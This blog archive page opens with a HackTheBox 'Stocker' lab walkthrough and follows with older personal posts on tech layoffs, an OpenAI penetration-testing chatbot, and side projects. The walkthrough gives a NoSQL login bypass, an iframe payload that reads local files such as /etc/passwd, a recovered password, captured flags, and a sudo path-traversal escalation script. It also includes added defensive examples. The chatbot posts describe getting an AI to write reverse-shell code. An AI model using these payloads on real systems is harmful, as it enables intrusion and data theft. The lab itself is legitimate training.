
HackTheBox – Stocker


I started up an account recently on HackTheBox. Primarily because I’ve already done all the Active Directory related rooms on TryHackMe, but it’s another great place to learn and play.

This time I will give my walkthrough of a box on HackTheBox.com called Stocker. Overall I would rate this a Lower-Mid level box.

Initial Enumeration

------------------------------------------------------------
        Threader 3000 - Multi-threaded Port Scanner          
                       Version 1.0.7                    
                   A project by The Mayor               
------------------------------------------------------------
Enter your target IP address or URL here: 10.10.11.196
------------------------------------------------------------
Scanning target 10.10.11.196
Time started: 2023-01-30 12:07:11.973696
------------------------------------------------------------
Port 22 is open
Port 80 is open
Port scan completed in 0:01:05.023631
------------------------------------------------------------
Threader3000 recommends the following Nmap scan:
************************************************************
nmap -p22,80 -sV -sC -T4 -Pn -oA 10.10.11.196 10.10.11.196
************************************************************
Would you like to run Nmap or quit to terminal?
------------------------------------------------------------
1 = Run suggested Nmap scan
2 = Run another Threader3000 scan
3 = Exit to terminal
------------------------------------------------------------
Option Selection: 1
nmap -p22,80 -sV -sC -T4 -Pn -oA 10.10.11.196 10.10.11.196
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 12:08 JST
Nmap scan report for 10.10.11.196
Host is up (0.19s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3d12971d86bc161683608f4f06e6d54e (RSA)
|   256 7c4d1a7868ce1200df491037f9ad174f (ECDSA)
|_  256 dd978050a5bacd7d55e827ed28fdaa3b (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://stocker.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.89 seconds
------------------------------------------------------------
Combined scan completed in 0:01:40.621978

Port 80 is open.

Enumerating the web server, I found no robots.txt. There is a 302 redirect on the standard port.

Added stocker.htb to /etc/hosts

Ran gobuster and found a dev.stocker.htb which I also added to /etc/hosts.

I found a bug against the current version of nginx 1.18.0 that this is using, but for some reason it wasn’t working properly and the machine became unstable so I requested a reboot.

Burpsuite and NOSQL Injection

I decided to enumerate a little further and found a NoSQL injection vulnerability in the login, tested with BurpSuite.

BurpSuite Capture Login

Changing the Content-Type to JSON and inserting a NoSQL bypass:

{"username":{"$ne":"corisan"},"password":{"$ne":"corisan"}}
BurpSuite NoSQL Injection Testing

After forwarding the packet from BurpSuite, this gets a login because the expression evaluates to true, and we now see items on the website. If we click on an item, add it to the cart, and then add an iframe into the captured packet pointing at /etc/passwd, it will give us a list of users.
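To show why that JSON body logs in, here is an added example (not the Stocker app's code): a tiny in-memory stand-in for the Mongo matcher, with the vulnerable query beside a type-checked one; the user list is constructed.

```javascript
// Added example: minimal stand-in for MongoDB's findOne matching, enough to
// show why {"username":{"$ne":"x"},"password":{"$ne":"x"}} matches the first
// user, and the input check that closes the hole. No database needed.

// Constructed sample users (not real Stocker data).
const users = [
  { username: 'alice', password: 'hunter2' },
  { username: 'bob', password: 'letmein' },
];

// Subset of Mongo's matching rules: a plain value must be equal; an object
// carrying an operator key applies that operator instead.
function fieldMatches(stored, cond) {
  if (cond !== null && typeof cond === 'object') {
    if ('$ne' in cond) return stored !== cond.$ne;
    return false; // operators not modelled here never match
  }
  return stored === cond;
}

function findOne(collection, query) {
  const hit = collection.find(doc =>
    Object.keys(query).every(k => fieldMatches(doc[k], query[k])));
  return hit || null;
}

// Vulnerable pattern: whatever JSON arrived in req.body goes straight into the query,
// so an operator object is treated as a query clause rather than a password.
function loginVulnerable(body) {
  return findOne(users, { username: body.username, password: body.password });
}

// Hardened pattern: credentials must be plain strings before they touch the query.
function loginHardened(body) {
  const { username, password } = body;
  if (typeof username !== 'string' || typeof password !== 'string') {
    return null; // rejects operator objects, arrays, numbers and missing fields
  }
  return findOne(users, { username, password });
}

// Parsed form of the payload used above, as Express's JSON body parser sees it.
const injected = { username: { $ne: 'corisan' }, password: { $ne: 'corisan' } };
```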

BurpSuite – Post Forward get Login

Now we Add to Basket and Checkout

Post Login Checkout Basket

Embedding an iframe with path to the passwd file:

"title":"<iframe src=file:///etc/passwd height=500px width=500px></iframe>",
Embed File in an iFrame before submitting via BurpSuite

Requesting /api/po/ID on the site with the _id captured above gives us the rendered iframe, which is actually the contents of the /etc/passwd file:

Post Submit via BurpSuite gets us contents of /etc/passwd file.
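An added example, not the Stocker code, showing the fix on the rendering side: the client-supplied title is HTML-escaped before it reaches the purchase-order template, so the iframe is emitted as inert text. The item shape and function names are assumed.

```javascript
// Added example: the purchase-order page takes the item "title" from the client
// and drops it into HTML that a server-side converter renders, which is how an
// <iframe src=file://...> ends up fetching a local file. Escaping the field
// before it reaches the template turns the markup into plain text.

// Minimal HTML escaper covering the characters that can open a tag or attribute.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable rendering: the title is concatenated raw into the row.
function renderRowVulnerable(item) {
  return `<tr><td>${item.title}</td><td>${item.price}</td></tr>`;
}

// Hardened rendering: every client-controlled field is escaped, and the price
// is coerced to a number so it cannot carry markup either.
function renderRowHardened(item) {
  const price = Number(item.price);
  if (!Number.isFinite(price)) throw new TypeError('price must be numeric');
  return `<tr><td>${escapeHtml(item.title)}</td><td>${price.toFixed(2)}</td></tr>`;
}

// Regression check for a template that should emit only tr/td: true if any
// other tag survived rendering.
function containsForeignTag(html) {
  return /<(?!\/?(tr|td)\b)[a-z]/i.test(html);
}

// Constructed order item carrying the payload shape from the post.
const hostile = {
  title: '<iframe src=file:///etc/passwd height=500px width=500px></iframe>',
  price: '10.00',
};
```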

Now we have a possible username of angoose. Remember we are looking for a non system account and one with a shell such as /bin/bash. The others just show /bin/false or /usr/sbin/nologin so those are unusable for our purpose.

Now we can use the same trick to grab the site’s index.js so we can find a password.

BurpSuite iFrame injection to get contents of index.js
After Submitting Item w/ modified iFrame in BurpSuite we get the content of index.js as the Item

So now we have the password too, IHeardPassphrasesArePrettySecure, thanks to the coder hardcoding it into the script because they had not yet created any kind of dotenv environment or secrets database to store it in.

As an aside, a trick that coders will use is to obfuscate passwords to applications: take a password, base64 encode it, and store that in a file. Then read it from the application, run a base64 -d operation on it to recover the true password, and use it from a variable in the script. This keeps the password out of the script itself. One of the first things I like to do when enumerating for information/passwords is to see if I can find any base64 encoded files on the system.

I wrote a tool to help you scan for these kinds of base64 encoded files here on my github: https://github.com/c0ri/b64scan

SSH and First Flag

ssh angoose@10.10.11.196                                   
The authenticity of host '10.10.11.196 (10.10.11.196)' can't be established.
ED25519 key fingerprint is SHA256:jqYjSiavS/WjCMCrDzjEo7AcpCFS07X3OLtbGHo/7LQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.196' (ED25519) to the list of known hosts.
angoose@10.10.11.196's password: 

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

angoose@stocker:~$ who
angoose  pts/0        2023-01-30 04:31 (10.10.14.11)
angoose@stocker:~$ id
uid=1001(angoose) gid=1001(angoose) groups=1001(angoose)
angoose@stocker:~$ ls
user.txt
angoose@stocker:~$ cat user.txt
bce30eb254c192b18a0390a2d121822d

So I see from running sudo -l that we only have permission to run /usr/bin/node and only from /usr/local/scripts. First, let’s throw together a little .js script to read /root/root.txt file and see if we can get the system flag that way.

// -- getroot.js
const fs = require('fs');

fs.readFile('/root/root.txt', 'utf8', (err, data) => {
        if (err) {
                console.error(err);
                return;
        }
        console.log(data);
});

Now we will run it, but I use a trick to escape the /usr/local/scripts directory by just appending ../../../home/angoose/

This puts us in the correct directory to call our script from our home while still satisfying the requirement to run the script from /usr/local/scripts, as that is where the starting path is.

angoose@stocker:~$ sudo /usr/bin/node /usr/local/scripts/../../../home/angoose/getroot.js 
7383fc4bc3af1080ba3815cd4beba4d9

Review

I had some initial challenges with not being able to load the site. After that I had some instability which forced me to request a restart on the box after running some vulnerability against nginx.

I finally had better luck just doing some poking around with Burpsuite. Once I got on the box it was quite easy to get the system flag.

Fun Level: 7/10
Initial Difficulty: 4/10
Secondary Difficulty: 4/10

Like what I do? Buy me a coffee! https://www.buymeacoffee.com/c0ri

Big Tech Job Cuts – where to go now?

Google is one of the latest companies to cut tech jobs. Some 12,000 jobs this week.

With big tech reeling from some historic job losses, many tech workers may be wondering where they should go from here.

For myself, I’ve been studying Cybersecurity for the last 10 months or so. Like many large enterprise organisations, I’ve seen a tremendous uptick in Security related incidents. At some point I decided to turn my attention to the subject.

As I would find out some 10 months later, it’s a very good thing I did. I was one of the many hundreds of thousands that have been affected by the recent layoffs from Big Tech globally.

I’ve been doing some studying recently to see what fields are popping for the mid-term and long-term future. Here are some interesting results.

  1. Data science and analysis: With the increasing amount of data being generated, there is a growing demand for professionals who can collect, analyze, and interpret data.
  2. Cybersecurity: As technology becomes more prevalent, the need for professionals who can protect against cyber threats also increases.
  3. Cloud computing: As more companies move their operations to the cloud, there is a growing need for professionals who can design, build, and maintain cloud-based systems.
  4. Artificial intelligence and machine learning: As these technologies continue to advance, there will be a growing demand for professionals who can develop and apply AI and ML solutions to various industries.
  5. Business development and consulting: With the changing business landscape, there is a need for professionals who can help companies navigate and adapt to new technologies and market trends.
  6. Project and product management: This role involves leading cross-functional teams to deliver a product or service.

While some of these jobs may be common-sense alternatives, some might be surprising. For example, Project and product management. I think maybe for the short-term this might be important, but long term I’m not so sure.

Some of the obvious ones are AI and Cybersecurity however. I would also say that anything supporting Cloud computing is quite important. This is because so many new tools need to be made in this area to handle integration from analytics, cybersecurity and more.

If you are one of the many tech workers who has lost their jobs, I feel your pain. I put this list together to share some hope for a bright new future though. Wishing you all the best of luck as we navigate these new and uncertain times ahead.

Isis OpenAI Chatbot for Penetration Testing

It seems that I will be having some more time to work on my personal projects and also working towards my OSCP because I quit my job. I will be looking for a new gig after some needed time off, but in the meantime I’m excited to continue my studies with Penetration Testing as well as doing some coding projects that I’ve been wanting to either finish or start.

I’ve added some code to the Isis OpenAI Chatbot for Penetration Testing. This is more how I envisioned it working as a hands-free way to interact with me. There are still some quirks going on with the OpenAI that I’ve found and I will touch on these.

First, I named this project, as I mentioned, after the Isis character in the Star Trek episode Assignment: Earth. There was an AI that was able to work with a character called Gary Seven to save the planet. In that light, I really added a lot of fluff to the AI code. You can tweak it to your liking. I’d also add that some of the code such as the history and training questions can and probably should be tweaked. If you re-inject those with every question, you will probably eat up tokens and money fast. So please be aware of that.

For the next things I want to do, I need to add some ability for Isis to save things like injections, snippets and code into either files or into my working flow. To be honest, when I started this project I was so shocked that Isis actually generated some totally unique reverse shell code for me in PHP. I had thought maybe it would look it up on the internet and post me something. It actually coded something! Interestingly I could not get the same result using the playground as the public API seems to block ‘dangerous’ code. I’m not sure how concessions would be made for legitimate penetration testers.

Isis OpenAI Chatbot for Penetration Testing is something really cool. As far as I know it was the 1st of its kind. This was released and within weeks, I saw other cool apps from others follow, like Github’s Copilot, which to my mind is super cool, and similar to how I envisioned Isis to begin with, except I would like the choice to save code/snippets/scripts into places of my choosing.

Anyway, play around with it and see what you think. If you have any suggestions for improvements or wish to contribute, then go for it. You can find the code on my Github here:

https://github.com/c0ri/isis

Isis – AI chatbot to help you with Penetration Testing

I have been super busy lately. Doing graduate studies, and also working hard every day training for my OSCP exam. I have been very productive tho!

I made some new code for penetration testers that will act as a helper to find code inserts, shells, SQL injection and the like for you. AFAIK it’s the first of its kind and it uses some pretty decent AI from OpenAI.

I like to think of ‘her’ as an angel on my shoulder. Imagine you are under a tight deadline. A company gave you only 5 days to test their websites and report your findings. Then imagine talking to Isis while you work and having her pop up suggestions for reverse-shell code, SQL injection etc. WOOOOOoo!

My initial work is promising, but there are still some kinks to work out. If you wanna contribute to the code that’d be cool too.

If you are interested in the code you can check it out here: https://github.com/c0ri/isis

Love what I do? https://www.buymeacoffee.com/c0ri

Haniwa Shutdown

After successfully setting up my new idea, Haniwa, and testing it for 6 months, I’ve decided to shut the project down. I got only minor interest in the concept, and the server costs were eating me alive while I was looking for investors.

I may bring it back in some simpler form in the future and make it free by generating ads on the site for it, but for now I’m on to bigger and better things.

Haniwa

I have been very busy lately working on a new project called Haniwa. The idea is to have a bot which will act as a servant for us after we are dead and gone. Something to carry out our last wishes. It could be like an executor of a will, but with an Artificial Intelligence about it.

Haniwa’s primary function is to let loved ones and friends know that you have passed on, but it also includes the ability to send bank accounts, secret messages, crypto account logins and more. Things you might not be ready to share now, but you surely want someone to have after you are gone. The use cases are as endless as the ideas we have for future releases!

The name Haniwa is actually a Japanese term coined from using figures to place as caretakers for Emperors after they died. Previous to that when an Emperor died, it was commanded that all his servants and family be put to death and sent with him to the afterlife. Many people decided this was barbaric, and came up with the idea to use Haniwa instead. Now I will borrow this term and give it a new meaning, a sort of Flower Robot to tend our Grave after we are dead and gone.

I’ve chosen to run this one on a platform called Bubble.is or Bubble.io now. It is a fantastic no-code application, and I am finding all kinds of niche use cases for it after using it. The best part is it allows me to quickly setup an app and prove it out and get it to a state where it can be tested quickly and as a PoC for Venture Capitalists to jump aboard without wasting too much time coding a site from the ground up.

The first revision on Haniwa is nearly complete with all of the basic features ready such as scheduling mail and secured messages using AES-256 encryption. It is also responsive in that it handles PC, Tablet and Mobile well.

My main goal now is to get it functional and bring it to market. You know the old saying “If you aren’t embarrassed of your first release, you released too late!” I know there is a lot of work to do, and features I really want to add, but it’s important to get it out there.

For me this is something new. As far as I know, there is nothing like this. The idea for it came to me in a dream. I think for myself I am excited to use it.

Does this sound like an interesting idea? Drop me a line and share your stories or suggestions for it!

When Bots Need to Text You

I’ve been writing some bot code lately to send SMS to groups. I found the perfect API for this with Cisco’s Tropo Product.

The API is super simple to use. You can make API calls or just post to URL using CURL or Python’s urllib2 library.

The use of the service for DEV is Free, however if you need Production support and service you will want to move to Production for that. For my testing I just signed up for the free Dev service and started coding away.

To save you some time the solution for the service is something like this:

  • Sign up for an account, choosing Dev or Prod -> https://www.tropo.com/
  • Create an Application from their Portal
  • Click to add some code to /var/www/sms.py for both script boxes. You can use the same script.
  • At the bottom you need to attach a phone #. Typically this is the number closest to where you want to send SMS, however I noticed UK or EU based numbers could send more readily worldwide. For cost however, you may want to have your script set the CallerID of whatever numbers you pick based on the Country Code of the Recipients Phone. Go on and attach multiple numbers if you like.
  • Write up a script to post to the API. You can grab your API token from the bottom of your Applications Page in Tropo.

Posting is as simple as constructing a URL to the service like this: ​

https://api.tropo.com/1.0/sessions?action=create&token=TOKEN&numberToDial=11005555555&customerName=Joe+Good&msg=Tesintg+this+thing+out

That’s about it. Pretty Simple! Kudos to Tropo and Cisco for an amazing product!

If you have any questions or need help sending some SMS with your own account, then reach out to me.


Server

Been real busy at work lately so not much chance to update on Disa.

Updates on Project Disa: http://skyblue-soft.com/disa

I’ve gotten another server up now and will work next on the MongoDB for the backend support. Once that’s online, I will transfer my working code over to my container and test to make sure it’s all working. Then we can do some beta testing.

Thanks!

Disa

I’ve secured some new servers on DigitalOcean for Disa. She is close to taking the next step as I’ve been beta testing the web interface for her for some time and now ready to put her on a more reliable (and faster) platform.

Once that’s done, I’ll be able to start opening her up for a limited Beta trial for some of you. If you are a subscriber, you’ll get the 1st shot at using her.

On another note, I’m really impressed with DigitalOcean. I met those guys at the Automacon in Portland a few months ago, and they really have their shit together. The service is dead simple to set up, as they use containers worded as “Droplets” to their user base. This is a great thing because they can give you exactly what you want for an extremely cheap price. It’s also very scalable as you can simply spin up more Droplets to scale up. Works well with Kubernetes if you are going big. It’s also fast as hell. If you wanna check them out, then click this link and tell them I sent you and get an instant $10 credit to your account! That’s 2 months free at the time of this writing.

What’s the Word?

Sorry I’ve been completely busy over the last few months at work. I’ve been working hard to add a web front-end to my Twitter bot, and working out how to tie in the AI modules that I’ve spent the last year on. It was a tremendous undertaking but now I’m happy to report that it’s tied in and working well. I do however need to finish adding “moods” to my AI module before I turn it back on. I noticed after it had some discussions with folks that it would get aggressive with them and sometimes even get itself blocked for insulting their intelligence and the like. That’s definitely NOT what I want unless it’s something extremely warranted, so I’m adding some code to stabilize its mood and even have it change moods depending on different situations. After that I can finish pen-testing the whole rig, and make it public.

The new version is built to monetize, so I do intend to sell access in a 3-tier model.

  • TIER1: Simple access to AutoFollow and AutoUnfollow features.
  • TIER2: Access to more advanced features such as automatic fav, retweet, news & random quotes.
  • TIER3: Access to use the AI module.

I feel the AI will be a very cool feature, especially for businesses that need advertising and etc. or power users that have tons of people and need help when they are offline.

It’s also possible for users to have multiple Twitter accounts. I’m not so sure how to regulate that or even if I should. I just worry that I would have to charge more for that since compute and storage doth have its costs. I would really love to give away this kind of ability.

If you have any ideas, drop me a line and maybe I can get it added.

Please stay tuned, I’ll post details and be giving free access to my subscribers to help beta test. I’ve been testing it for a week or so, and it all works well.

Thanks always for your support!

In friendship,

Corley